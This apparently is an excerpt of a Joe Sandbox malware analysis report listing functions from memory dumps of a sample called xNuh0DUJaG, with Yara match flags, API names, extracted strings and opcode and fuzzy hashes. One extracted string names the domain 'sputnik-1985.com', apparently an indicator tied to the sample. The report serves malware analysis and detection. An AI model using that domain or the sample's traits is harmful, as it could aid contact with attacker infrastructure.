                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: nz$nz
                                                                                                                                                                                                                                        • API String ID: 0-4002586851
                                                                                                                                                                                                                                        • Opcode ID: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
                                                                                                                                                                                                                                        • Instruction ID: 0595a21b0f34da2779b8163bd3e774a810e440d158280e19aca7cd4d4a89eb3a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62E1E772608B808FD315DB3CC891396BFE3AF9A310F1D866DC5EA8B392D675A805C751
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: nz$nz
                                                                                                                                                                                                                                        • API String ID: 0-4002586851
                                                                                                                                                                                                                                        • Opcode ID: 526f9c3809e7de32db1ba61d9cd3c8c0a105809dfbe68e8e8f0a49bf4be969cf
                                                                                                                                                                                                                                        • Instruction ID: a3c1cfee1f99e453375e064e447a228442ae2f14524e15aa7be5cf63e3ec65e5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 526f9c3809e7de32db1ba61d9cd3c8c0a105809dfbe68e8e8f0a49bf4be969cf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACE11872608B808FD315CA3CC891396FFE2AFDA314F1D866DC5EA8B392D675A406C715
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: UXY^$sputnik-1985.com
                                                                                                                                                                                                                                        • API String ID: 0-288947201
                                                                                                                                                                                                                                        • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                                        • Instruction ID: 36a2f563dffbc950d33f107955b6241340eabd8a5ff9c9aa4c75c12c97de5944
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 329105B5604B818FD3158F26C9D0662FBA2FF56304B19869CC0D28FB56C779E406CF95
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: o~$yr
• API String ID: 0-1013308823
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: o~$yr
• API String ID: 0-1013308823
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: D`a&$NMNO
• API String ID: 0-4143563191
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: :7$%$:7$%
• API String ID: 0-2391988857
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: :7$%$:7$%
• API String ID: 0-2391988857
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: MO$MO
• API String ID: 0-3148518880
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: 7&'$$vA\
• API String ID: 0-2621209329
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: 7&'$$vA\
• API String ID: 0-2621209329
APIs
• RtlExpandEnvironmentStrings.NTDLL ref: 00411D64
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID:
• API String ID: 237503144-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: /p
• API String ID: 0-62938030
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02117E61
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID: EnvironmentExpandStrings
• String ID:
• API String ID: 237503144-0
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 021182CF
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID: EnvironmentExpandStrings
• String ID:
• API String ID: 237503144-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID: Object
• String ID:
• API String ID: 2936123098-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: Object
• String ID:
• API String ID: 2936123098-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: J
• API String ID: 0-1141589763
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: J
• API String ID: 0-1141589763
APIs
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID: Object
• String ID:
• API String ID: 2936123098-0
                                                                                                                                                                                                                                        • Opcode ID: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
                                                                                                                                                                                                                                        • Instruction ID: c991098d2942e1330a8ba3735ebbe51c6be24e551b09b5deec56a927cd917676
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC71B5B1E046508FC719CF6CC851359BFE2AB85314F2982ADD8999B3D2D7759806CB81
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2936123098-0
                                                                                                                                                                                                                                        • Opcode ID: 39bfddd0d89d5aa851c5ebc283ebdd57ba84922f60a181c47f450d59d7061f13
                                                                                                                                                                                                                                        • Instruction ID: 45239876aaa66c970168bcac432cbab02119562676560ecae2c3189c67bbcca7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39bfddd0d89d5aa851c5ebc283ebdd57ba84922f60a181c47f450d59d7061f13
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6571C7B1E046508FC718CF6CC851359BFF2AB99314F2982ADD8999F3D2D6759C06CB81
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                                                                                                                        • Opcode ID: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
                                                                                                                                                                                                                                        • Instruction ID: 8f7f33534c1155c82858add8b8e6177612938ff13f6db767dd12b5b71042ed13
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51912B11208BC28ED7268B3C88586157F925B67228B2D87DCD0FA8F7E7C7578107C366
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                                                                                                                        • Opcode ID: aee65baa84eec6bad4cf93c4ab93b2d334002cbc985cabf08a2e562f31577c33
                                                                                                                                                                                                                                        • Instruction ID: f2a30e19a756ef2febaf58aa14edd62971e43cb539abc4116fa3d4166735a6c9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aee65baa84eec6bad4cf93c4ab93b2d334002cbc985cabf08a2e562f31577c33
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51913A21208BC28ED3268B3C88486157F915B67228F2C87DCE0FA8F7E7C6568107C366
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                                                                                                                        • Opcode ID: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
                                                                                                                                                                                                                                        • Instruction ID: 2a6f63f53f274c2719391d736a44e2961b05b532b03c66aa236f66577199a951
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E912B21208BC28EC326CA3C88586557F921B67228B2D87DCD0FA8F7D7C7669107C766
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                                                                                                                        • Opcode ID: c3b337a8243762e24d3398e04d6e3e2f6a45ffd33d07df9af46c71bdbb35dbce
                                                                                                                                                                                                                                        • Instruction ID: 615ca32909d59e4e98a0e547278d02967b49bf7f3b148c397c41720c4b96474d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3b337a8243762e24d3398e04d6e3e2f6a45ffd33d07df9af46c71bdbb35dbce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB912C11208BC28EC326CA3C88586557F921BA7228F2D87DDD0FA8F7D7C7669507C766
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: :;
                                                                                                                                                                                                                                        • API String ID: 0-3581617570
                                                                                                                                                                                                                                        • Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                                                                                                                                                        • Instruction ID: 3983290d6fd2335681fc544608f0b0aa6463c583f74d04b6e5b87d4475d88796
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EA1E572A883209BD7149F24CC817AF73E1EF81324F198528FC959B291E375ED59C752
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: :;
                                                                                                                                                                                                                                        • API String ID: 0-3581617570
                                                                                                                                                                                                                                        • Opcode ID: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
                                                                                                                                                                                                                                        • Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
• Opcode Fuzzy Hash: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
• Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: NP,?
• API String ID: 0-3110377521
• Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
• Instruction ID: 993707e29881803d9eeff06886ba90ad4faafeb075afa3bf8289254efe38a485
• Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
• Instruction Fuzzy Hash: 40A149726843109BD725CF28CCC1B7BB7A7EBC5728F19862DE59867294D7319801CBD1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: NP,?
• API String ID: 0-3110377521
• Opcode ID: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
• Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
• Opcode Fuzzy Hash: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
• Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: ''
• API String ID: 0-694448769
• Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
• Instruction ID: 3883b6cc8dcef48c76b85bebe2a1d7b4bfb12ab289dbd19937482fd30b24428d
• Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
• Instruction Fuzzy Hash: A39110B16983108BC314CF28C89166BB7E2EFC1364F189A2DE8D68B790E778C505C797
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: ''
• API String ID: 0-694448769
• Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
• Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
• Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
• Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: *+
• API String ID: 0-2181965719
• Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
• Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
• Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
• Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: _\]R
• API String ID: 0-1576797437
• Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
• Instruction ID: 423a7ca2f62ec043ce47bbd2c4737e90bf8997a8b7dc59a4ed136a52272c5c1e
• Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
• Instruction Fuzzy Hash: 799128316483529BC718DF28C850A6FB7E2EFD9324F19856CF9C997291EB31D841CB86
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID: InitializeThunk
• String ID: _\]R
• API String ID: 2994545307-1576797437
• Opcode ID: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
• Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
• Opcode Fuzzy Hash: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
• Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID: 0-3019521637
• Opcode ID: e0b172cd705df7923fbf2ed4e27c4b33ed5b0099bb5f0496611bea36cd42384f
• Instruction ID: 44892d0f856a689a37bbf21d6997815d0246af92606d078c65545a335e670424
• Opcode Fuzzy Hash: e0b172cd705df7923fbf2ed4e27c4b33ed5b0099bb5f0496611bea36cd42384f
• Instruction Fuzzy Hash: 94814AB1A883205BD7149F648CD1B2F73A6EFC1314F1A863CF8954B281E735D819C7A5
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,
• API String ID: 0-3772416878
• Opcode ID: cb9d9bb17d339ae8af9f285b74fa207be133779a529036d3e62f497118ea5ea7
• Instruction ID: f81f718cea34ff01307e1637895fdcedf0664efaeae007c94692e942105a2583
• Opcode Fuzzy Hash: cb9d9bb17d339ae8af9f285b74fa207be133779a529036d3e62f497118ea5ea7
• Instruction Fuzzy Hash: 88B138712083819FD324CF58C89465BFBE4AFA9204F448A2DF5D997382D771EA18CB97
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                                                                                                        • Opcode ID: cb9d9bb17d339ae8af9f285b74fa207be133779a529036d3e62f497118ea5ea7
                                                                                                                                                                                                                                        • Instruction ID: 01c58491163616012ee55187fd92943d7eb5500c339a617f16e03986bf466463
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb9d9bb17d339ae8af9f285b74fa207be133779a529036d3e62f497118ea5ea7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86B138711093819FD321CF18C88065BFBE0AFA9304F444A2DF5DA97782D675EA18CBA6
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                                                                                                        • Opcode ID: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
                                                                                                                                                                                                                                        • Instruction ID: fae630b8e427c4637ac50e37632e286b503d438759fe9f5fc43af62aa089000e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE813836799A904BD72D9A3C4C212BA7A930BD6130F2DC7BDB5F68B3E1D65988058384
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
